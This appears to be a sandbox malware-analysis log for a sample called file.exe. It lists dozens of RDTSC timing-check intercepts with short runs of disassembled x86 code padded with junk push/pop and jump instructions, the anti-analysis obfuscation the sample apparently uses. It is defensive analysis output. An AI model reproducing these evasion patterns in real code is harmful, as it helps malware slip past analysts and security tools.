Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49B06F7 second address: 49B06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0158C second address: 4A015D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E64DC24C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E64DC24C8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A015D8 second address: 4A015DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A015DC second address: 4A015E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A015E2 second address: 49A091D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 3178BCF7h 0x00000011 pushfd 0x00000012 jmp 00007F6E644F752Ch 0x00000017 jmp 00007F6E644F7535h 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f jmp 00007F6E644F752Eh 0x00000024 jmp dword ptr [7721155Ch] 0x0000002a mov edi, edi 0x0000002c push ebp 0x0000002d mov ebp, esp 0x0000002f mov ecx, dword ptr fs:[00000018h] 0x00000036 mov eax, dword ptr [ebp+08h] 0x00000039 mov dword ptr [ecx+34h], 00000000h 0x00000040 cmp eax, 40h 0x00000043 jnc 00007F6E644F752Dh 0x00000045 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000004c pop ebp 0x0000004d retn 0004h 0x00000050 test eax, eax 0x00000052 je 00007F6E644F7543h 0x00000054 mov eax, dword ptr [00459710h] 0x00000059 cmp eax, FFFFFFFFh 0x0000005c je 00007F6E644F7539h 0x0000005e mov esi, 00401BB4h 0x00000063 push esi 0x00000064 call 00007F6E68A8ECAAh 0x00000069 mov edi, edi 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990730 second address: 499073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499073F second address: 4990758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0640199Ah 0x00000008 mov edi, 52F63566h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov di, 7EECh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990758 second address: 49907CB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6E64DC24C5h 0x00000008 and ah, FFFFFFC6h 0x0000000b jmp 00007F6E64DC24C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 52B07777h 0x00000018 popad 0x00000019 mov ecx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov eax, 08A8DE6Fh 0x00000022 call 00007F6E64DC24C4h 0x00000027 mov edi, esi 0x00000029 pop eax 0x0000002a popad 0x0000002b mov eax, 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6E64DC24C4h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49907CB second address: 49907D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49907D1 second address: 4990801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E64DC24BCh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e inc eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E64DC24C8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990801 second address: 4990807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4990807 second address: 499080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0004A second address: 4A0004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0004E second address: 4A00052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00052 second address: 4A00058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00058 second address: 4A0006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0006B second address: 4A0006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0006F second address: 4A00097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F6E64DC24C5h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00097 second address: 4A0009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0009B second address: 4A000A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000A1 second address: 4A000B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7531h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A000B6 second address: 4A00137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d jmp 00007F6E64DC24C1h 0x00000022 movzx ecx, di 0x00000025 popad 0x00000026 push ecx 0x00000027 pushad 0x00000028 movzx ecx, dx 0x0000002b jmp 00007F6E64DC24BBh 0x00000030 popad 0x00000031 mov dword ptr [esp], ebx 0x00000034 jmp 00007F6E64DC24C6h 0x00000039 mov ebx, dword ptr [eax+10h] 0x0000003c jmp 00007F6E64DC24C0h 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00137 second address: 4A00159 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F6E644F7532h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00159 second address: 4A001B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [772406ECh] 0x0000000f pushad 0x00000010 jmp 00007F6E64DC24BCh 0x00000015 pushfd 0x00000016 jmp 00007F6E64DC24C2h 0x0000001b sbb ecx, 4C7F5E48h 0x00000021 jmp 00007F6E64DC24BBh 0x00000026 popfd 0x00000027 popad 0x00000028 test esi, esi 0x0000002a pushad 0x0000002b mov edi, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f movzx ecx, di 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001B5 second address: 4A001E9 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6E644F7533h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F6E644F82BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6E644F7531h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001E9 second address: 4A001FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A001FE second address: 4A00204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00204 second address: 4A00208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00208 second address: 4A0020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0020C second address: 4A00222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24BBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00222 second address: 4A00281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6E644F7533h 0x00000014 pushfd 0x00000015 jmp 00007F6E644F7538h 0x0000001a xor ah, 00000058h 0x0000001d jmp 00007F6E644F752Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00281 second address: 4A002CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2113107Ah 0x00000008 call 00007F6E64DC24BBh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 call dword ptr [77210B60h] 0x00000017 mov eax, 766BE5E0h 0x0000001c ret 0x0000001d pushad 0x0000001e jmp 00007F6E64DC24C0h 0x00000023 popad 0x00000024 push 00000044h 0x00000026 pushad 0x00000027 mov dx, ax 0x0000002a movzx eax, bx 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F6E64DC24C0h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A002CD second address: 4A00395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F752Ch 0x00000009 or esi, 0BBAFC78h 0x0000000f jmp 00007F6E644F752Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, edi 0x00000019 jmp 00007F6E644F7536h 0x0000001e push eax 0x0000001f jmp 00007F6E644F752Bh 0x00000024 xchg eax, edi 0x00000025 jmp 00007F6E644F7536h 0x0000002a push dword ptr [eax] 0x0000002c pushad 0x0000002d mov al, 01h 0x0000002f pushfd 0x00000030 jmp 00007F6E644F7533h 0x00000035 sbb si, 26FEh 0x0000003a jmp 00007F6E644F7539h 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr fs:[00000030h] 0x00000047 jmp 00007F6E644F752Eh 0x0000004c push dword ptr [eax+18h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F6E644F7537h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0042C second address: 4A0043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0043B second address: 4A004A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F6E644F752Fh 0x00000014 sub ecx, 4E8111FEh 0x0000001a jmp 00007F6E644F7539h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F6E644F7533h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A004A8 second address: 4A004AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A004AC second address: 4A00571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a jmp 00007F6E644F752Bh 0x0000000f mov dword ptr [esi+10h], eax 0x00000012 jmp 00007F6E644F7536h 0x00000017 mov eax, dword ptr [ebx+50h] 0x0000001a jmp 00007F6E644F7530h 0x0000001f mov dword ptr [esi+14h], eax 0x00000022 jmp 00007F6E644F7530h 0x00000027 mov eax, dword ptr [ebx+54h] 0x0000002a jmp 00007F6E644F7530h 0x0000002f mov dword ptr [esi+18h], eax 0x00000032 pushad 0x00000033 push eax 0x00000034 pushfd 0x00000035 jmp 00007F6E644F752Dh 0x0000003a or si, 3306h 0x0000003f jmp 00007F6E644F7531h 0x00000044 popfd 0x00000045 pop eax 0x00000046 mov eax, ebx 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+58h] 0x0000004c jmp 00007F6E644F7533h 0x00000051 mov dword ptr [esi+1Ch], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F6E644F7535h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00571 second address: 4A005D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007F6E64DC24BEh 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 jmp 00007F6E64DC24C0h 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c jmp 00007F6E64DC24C0h 0x00000021 mov dword ptr [esi+24h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6E64DC24C7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A005D9 second address: 4A005DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A005DF second address: 4A005E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A005E3 second address: 4A00623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c call 00007F6E644F752Dh 0x00000011 mov eax, 4CB7C417h 0x00000016 pop ecx 0x00000017 push ebx 0x00000018 mov ch, 1Fh 0x0000001a pop edi 0x0000001b popad 0x0000001c mov dword ptr [esi+28h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6E644F7537h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00623 second address: 4A0062C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E4DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007E9 second address: 4A007EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A007EF second address: 4A00844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 mov ecx, edx 0x00000014 popad 0x00000015 push 00000001h 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b mov esi, 1CDEF3BDh 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F6E64DC24C8h 0x00000027 push eax 0x00000028 pushad 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dl, D1h 0x0000002f mov ax, 5F0Dh 0x00000033 popad 0x00000034 mov ax, DF09h 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00844 second address: 4A00848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00848 second address: 4A00859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00859 second address: 4A0088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6E644F752Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E644F752Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0088F second address: 4A00895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00895 second address: 4A0089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A008E6 second address: 4A008EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A008EA second address: 4A008EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A008EE second address: 4A008F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A008F4 second address: 4A00955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7532h 0x00000009 adc eax, 1C368508h 0x0000000f jmp 00007F6E644F752Bh 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edi, edi 0x0000001d jmp 00007F6E644F7532h 0x00000022 js 00007F6ED6CB62B3h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6E644F7537h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00955 second address: 4A0099D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp-0Ch] 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 jmp 00007F6E64DC24C5h 0x00000018 popad 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6E64DC24C8h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0099D second address: 4A009A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A009A3 second address: 4A009BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 63A3h 0x00000007 mov ecx, 51A096FFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebx+78h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A009BB second address: 4A009BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A009BF second address: 4A009D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A009D6 second address: 4A00A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F6E644F7530h 0x0000000c sub ecx, 2270A348h 0x00000012 jmp 00007F6E644F752Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 00000001h 0x0000001d jmp 00007F6E644F7536h 0x00000022 nop 0x00000023 pushad 0x00000024 mov dl, ch 0x00000026 mov dh, 8Eh 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A28 second address: 4A00A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00A36 second address: 4A00B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7531h 0x00000009 or ax, E876h 0x0000000e jmp 00007F6E644F7531h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e pushfd 0x0000001f jmp 00007F6E644F7535h 0x00000024 sbb esi, 27776486h 0x0000002a jmp 00007F6E644F7531h 0x0000002f popfd 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp-08h] 0x00000034 jmp 00007F6E644F752Eh 0x00000039 nop 0x0000003a pushad 0x0000003b jmp 00007F6E644F752Eh 0x00000040 pushfd 0x00000041 jmp 00007F6E644F7532h 0x00000046 sub si, 8188h 0x0000004b jmp 00007F6E644F752Bh 0x00000050 popfd 0x00000051 popad 0x00000052 push eax 0x00000053 jmp 00007F6E644F7539h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F6E644F752Dh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00B0B second address: 4A00B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00B61 second address: 4A00BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6ED6CB6061h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6E644F7533h 0x00000018 sbb al, FFFFFFFEh 0x0000001b jmp 00007F6E644F7539h 0x00000020 popfd 0x00000021 mov esi, 26B48047h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00BBE second address: 4A00C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F6E64DC24BFh 0x0000000b sbb esi, 6725660Eh 0x00000011 jmp 00007F6E64DC24C9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d jmp 00007F6E64DC24BEh 0x00000022 mov dword ptr [esi+08h], eax 0x00000025 pushad 0x00000026 call 00007F6E64DC24BEh 0x0000002b pushfd 0x0000002c jmp 00007F6E64DC24C2h 0x00000031 adc esi, 466E36E8h 0x00000037 jmp 00007F6E64DC24BBh 0x0000003c popfd 0x0000003d pop ecx 0x0000003e pushfd 0x0000003f jmp 00007F6E64DC24C9h 0x00000044 jmp 00007F6E64DC24BBh 0x00000049 popfd 0x0000004a popad 0x0000004b lea eax, dword ptr [ebx+70h] 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F6E64DC24C4h 0x00000055 add eax, 04290BA8h 0x0000005b jmp 00007F6E64DC24BBh 0x00000060 popfd 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00C96 second address: 4A00CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 00000001h 0x00000008 jmp 00007F6E644F7530h 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F6E644F752Dh 0x00000016 call 00007F6E644F7530h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00CD1 second address: 4A00D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, B144h 0x0000000f pushfd 0x00000010 jmp 00007F6E64DC24BDh 0x00000015 xor eax, 1A117A86h 0x0000001b jmp 00007F6E64DC24C1h 0x00000020 popfd 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F6E64DC24BEh 0x00000028 lea eax, dword ptr [ebp-18h] 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
